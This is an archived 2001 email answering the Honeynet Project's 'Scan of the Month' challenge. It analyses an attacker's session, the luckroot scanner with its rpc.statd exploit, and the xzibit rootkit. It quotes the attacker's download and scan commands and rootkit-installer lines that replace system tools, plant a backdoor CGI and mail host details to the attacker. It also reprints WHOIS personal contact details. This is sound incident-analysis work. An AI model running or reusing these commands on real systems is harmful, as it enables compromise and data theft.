From Chad.Johnston@wcom.com Sat Mar 17 20:01:22 2001 Date: Fri, 02 Mar 2001 10:32:05 -0700 From: Chad Johnston To: project@honeynet.org Subject: Submission for March scan of the Month [ The following text is in the "iso-8859-1" character set. ] [ Your display is set for the "US-ASCII" character set. ] [ Some characters may be displayed incorrectly. ] Here is my submission for March's scan of the Month: ----------------------------------------------------------------- 1. What is the blackhat attempting to do with his command line syntax? Change into a hidden directory: cd .mail cd /usr/sbin/.mail Retrieve the scanning tool: lynx www.becys.org/LUCKROOT.TAR y Untar (with a few tries to get the arg order correct): tar -xvfz LUCKROOT.TAR tar -xzvf Lu tar -xzvf L tar -xzvf LUCKROOT.TAR Run the scanner/exploit against a number of targets. Each run specifies and A class and a B class subnet to scan. For example, the first scan will look at the first 1000 IPs in the range 216.210.0.0 to 216.210.255.255. cd luckroot ./luckgo 216 210 ./luckgo 200 120 ./luckgo 64 120 .luckgo 216 200 ./luckgo 216 200 ./luckgo 200 120 ./luckgo 63 1 ./luckgo 216 10 ./luckgo 210 120 ./luckgo 64 1 ./luckgo 216 1 ./luckgo 194 1 ./luckgo 216 1 ./luckgo 210 128 ./luckgo 24 1 ./luckgo 12 20 ----------------------------------------------------------------- 2. What does the tool accomplish? This tool scans networks for systems running RedHat 6.0,6.1, or 6.2 that have nfs-utils running. It then uses a rpc.statd exploit to gain remote root access. Once root access is gained, a rootkit (xzibit.tar.gz) is downloaded and installed onto the compromised server. ----------------------------------------------------------------- 3. How does the tool work? The shell script, luckgo, is called with the IP value(s) of the systems to be scanned. If only one value is passed, the entire A-class subnet is scanned. For example, if ./luckgo 123 is entered, the scan will encompass the IP range 123.0.0.0 to 123.255.255.255 (Well, not all of this range actually. Examination of the code shows that a maximum of 1000 addresses are scanned.) Luckgo takes additional arguments to narrow the scan down to B class and C class subnets as well. The luckgo script then compiles the luckscan-a.c and luckstatdx.c sources and calls luckscan-a with the arguments supplied, plus the fixed argument of 111, whose purpose becomes clear when the code for luckscan-a.c and luckstadx.c is examined. Luckscan-a is a very simple port scanner. Depending on the arguments, an array of possible targets is built. For each IP address in this array a connection is attempted to port 111, the rpc port. If the connection succeeds, the IP address is passed on to luckstatdx to see if the system can be compromised. Luckscan is basically a simple wrapper to determine what addresses are possibly exploitable. Luckstatdx is the guts of the exploit. It uses the well known rpc.statd exploit to connect to the system and attempt to gain remote root access. (I must confess to not knowing exactly how the statd exploit works. My knowledge of assembly seems to have suffered from severe bit rot since I last used it.) If the attempt succeeds, luckstatdx downloads xzibit.tar.gz and installs it onto the compromised system. Xzibit.tar.gz is a nice little rootkit, and it performs some nice tasks as part of its installation process. Here is a summary of what happens (install script heavily snipped): Replace system tools: echo -n "Replacing netstat, ps, ifconfig, top... " Set up some bogus entries in /dev: echo -n "Setting up the /dev filez... " touch /dev/dsx touch /dev/caca Create a directory for the backdoor: echo "Creating home... " mkdir -p /dev/ida/.inet echo "Copying SSHD and shit..." mv -f linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c /dev/ida/.inet/ touch /dev/ida/.inet/tcp.log Install a new hdparm: echo "/usr/bin/hdparm -t1 -X53 -p" >> /etc/rc.d/rc.sysinit echo >> /etc/rc.d/rc.sysinit mv hdparm -f /usr/bin/ chmod 500 /usr/bin/hdparm chattr +i /usr/bin/hdparm /usr/bin/hdparm Install a backdoor cgi script: if [ -d /home/httpd/cgi-bin ] then mv -f becys.cgi /home/httpd/cgi-bin/ fi ^Åetc..for many different web servers^Å Send an email confirming the install: touch /tmp/info /sbin/ifconfig | grep inet >> /tmp/info hostname -f >> /tmp/info uname -a >> /tmp/info cat /tmp/info | mail -s "becys rewting" becys@becys.org rm -f /tmp/info One aspect of the rootkit install that jumps out at me is the becys.cgi program. Personally, I think it would make sense to use a name that^Òs not going to be quite as suspicious. The cgi script itself has been compiled, but by examining the binary with a hex editor, the string ^ÓCommand to Execute^Ô can be seen, which indicates to me that this cgi is another backdoor way of allowing arbitrary commands to be executed on the compromised system. ------------------------------------------------------------------ 4. Is this tool a worm, or would you classify it as something else? This tool does not appear to be a worm, since it has no means of replicating itself across the network. It is simply a tool that allows for a mass attempt of a known exploit. ------------------------------------------------------------------ 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? The shell script and luckscan-a are probably somewhat original, as they are wrappers to the actual exploit code. The exploit code luckstatdx, however, is not original. I found a version released in October of 2000 at http://archives.neohapsis.com/archives/bugtraq/2000-10/0165.html. Luckstatdx is nearly identical to this version. Using WinDiff, most of the changes can be attributed to things like multiple variables being declared on one line in one version, and separately in the other version. Of course, the most notable difference is the actual shellcode that is run once the exploit succeeds. ------------------------------------------------------------------ Bonus Question: What information can you obtain about who is using or created the tool? The address www.becsy.org resolves to the IP address 64.176.171.107. Arin.net claims that this IP range belongs to Alabanza, a web hosting company. Performing a WHOIS query on becys.org returns the following information: bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Domain Name: BECYS.ORG Administrative Contact: Qian Wang becys@yahoo.com bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Phone- (979)862-9233 Technical Contact: Web Site Source, In info@websitesource.com Web Site Source, Inc. 2476 Bolsover, Suite 484 Houston, TX 77005-2518 US Phone- 713-667-2520 Fax- 800-863-6499 Interestingly enough, none of this information points to Romania. Of course, this doesn^Òt mean that the Romanian blackhat community isn^Òt involved. ----------------------------------------------------------------- Resources: http://www.arin.net IP Lookup http://networksolutions.com/cgi-bin/whois/whois WHOIS Lookup http://crs.intrinsec.com/archive/bugtraq/bugtraq_1997_11/0228.html rpc.statd Solaris exploit http://archives.neohapsis.com/archives/bugtraq/2000-10/0165.html Statdx source code http://www.cs.berkeley.edu/idsg/security/redhat-rpc.statd.shtml Information about RedHat vulnerability http://project.honeynet.org/scans/scan10/job.txt More information about statdx exploit ------------------------------------------------------------------ Thanks! Chad Johnston Sunset Group Limited (719) 535-6284 cjohnston@sunsetgroup.com Chad.Johnston@wcom.com